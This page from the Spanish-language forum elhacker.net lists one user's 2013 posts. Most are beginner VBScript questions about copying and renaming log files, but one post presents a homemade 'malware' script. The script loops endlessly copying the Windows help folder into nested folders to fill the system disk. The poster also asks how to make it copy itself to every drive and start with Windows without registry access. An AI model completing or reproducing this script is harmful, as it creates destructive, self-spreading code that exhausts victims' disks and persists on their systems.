elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 ... 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18]
171  Seguridad Informática / Análisis y Diseño de Malware / Re: Analisis de mi Malware en: 13 Octubre 2013, 22:21 pm
tu respuesta me interesa utilizarla, pero necesito una descripcion de lo que hace, pues cuando sustituyo tu codigo por el mio y ejecuto el archivo, me abre un cartel msgbox que dice "c:windows", reviso el administrador de tareas y se esta ejecutando, pero no puedo monitorizarlo porque no se donde esta llenando el hdd. Por favor soy nuevo en esto, explicame si puedes. Gracias de antemano
172  Programación / Scripting / Re: [AYUDA][VBS] Duda sobre la copia y renombrado automatico de archivos en: 13 Octubre 2013, 22:10 pm
un millon de gracias por ambos codigos, ahora mismo me propongo a estudiarlos para aprender que es lo que hace y que no sea solo algo mecanico. Cualkier otra duda se que aki encontrare la respuesta
173  Seguridad Informática / Análisis y Diseño de Malware / Analisis de mi Malware en: 10 Octubre 2013, 14:18 pm
Hola a todos, soy nuevo en esto del malware, tan nuevo que este es mi primer intento despues de crear un bucle infinito en batch; ahora la cuestion es que ya tengo el codigo del malware, lo que quiero es hacerlo un virus,o sea, que se autocopie a todas las unidades de la pc y se ejecute al iniciar windows aun cuando el usuario que lo ejecute no pueda escribir en el registro. el diseño seria asi
Código:
on error resume next

' Declaracion de variables
set objshell = createobject("wscript.shell")
set objfso = createobject("scripting.filesystemobject")
dim perfil_usuario
dim carpeta_destino
dim cont
dim ampliar
dim help

rem                    Inicializacion de las variables
perfil_usuario = objshell.expandenvironmentstrings("%userprofile%")
help = objshell.expandenvironmentstrings("%windir%")
msgbox (help)
icono = objshell.expandenvironmentstrings("%windir%\system32")
carpeta_destino = objfso.createfolder(perfil_usuario & "\Dark_Stone")
llenar = objfso.createfolder(perfil_usuario & "\Dark_Stone\llenar")



rem                    Cuerpo
while (5=5)
 copiar = objfso.copyfolder(help & "\help", llenar)
 ampliar = objfso.createfolder(llenar & "\llenando")
 llenar = ampliar
wend

lo del while (5=5) es una condicion que yo usaba en la escuela para decir que algo tenia que ejecutarse siempre sin final.
el objetivo de este codigo es llenar el espacio de la particion donde esta instalado el sistema operativo, lo que no logro hacer de ninguna forma y por eso no puse el codigo es que se copie. Por favor ayuda y espero haber ayudado a alguien con mi propuesta de codigo.

PD: Es valido tambien cualkier aporte al diseño y a la forma visual del malware!
174  Programación / Scripting / Re: [AYUDA][VBS] Duda sobre la copia y renombrado automatico de archivos en: 19 Septiembre 2013, 22:34 pm
gracias por el intento de ayuda, comprendi la idea, pero mis conocimientos de vbs lamentablemente no me dan para tanto, aunke espero ir mejorando, es que soy algo inconstante en esto de ser autodiacta y no me mantengo mucho tiempo estudiando. La cuestion y a la vez el pollo del arroz con pollo es como renombrar un archivo en vbs? porque yo puedo buscar por la red, pero me demoro mucho porque estoy en cuba y mi conexion es pesima, imaginate que la descarga es de 9kb/s, por eso prefiero preguntar a buscar eternamente. Si me pueden ayudar, lo agradezco desde ahora, lo que necesito saber es como renombrar un archivo y como saber cuando tengo un dispositivo usb nuevo conectado, asi puedo completar el trabajo que trato de hacer. gracias
175  Programación / Scripting / [AYUDA][VBS] Duda sobre la copia y renombrado automatico de archivos en: 7 Febrero 2013, 22:51 pm
Hola gente, me disculpan si este tema se trato en otro post, pero es que el tema de scripting tiene demasiadas paginas y ponerme a buscar en cada una de ellas me demoraria mas de lo que seria si alguien me ayudara y despues cerraran el tema.

Weno, a lo que iba, resulta que estoy aprendiendo vbs gracias a los post que han ido dejando en este foro, gracias por adelantado, y ahora se me ocurrio la idea de hacer un script que cuando lo ejecute, copie la informacion de una tarjeta Compact Flash para la carpeta de mi turno de trabajo, pero que no la copie asi mismo, sino que la renombre al terminar con un nombre que yo le de al terminar la copia
Ej:
Copiar de G:\kijo.log a d:\danny\07-02\nombre-especificoa

yo estaba pensando en algo asi como

Código:
set objfso = createobject("scripting.filesystemobject")
   if exist ("d:\danny\07-02") then
     objfso.copyfile ("F:\kijo.log", "d:\danny\07-02\", false)
     chapa = inputbox("Escriba la chapa del Vehiculo")
     objfso.renamefile ("d:\danny\07-02\kijo.log", chapa)
     msgbox ("Se ha copiado el archivo.")
   else
     set carpeta = objfso.createfolder ("d:\danny\07-02")
     objfso.copyfile ("F:\kijo.log", "d:\danny\07-02\")
     chapa = inputbox("Escriba la chapa del Vehiculo")
     objfso.renamefile ("d:\danny\07-02\kijo.log", chapa)
     msgbox ("Se ha copiado el archivo despues de crear la carpeta.")
exit

pero por supuesto, si lo pongo aki es xq no me funciona verdad?? por tanto si alguien pudiera ayudarme lo agradeceria.
Páginas: 1 ... 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [18]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines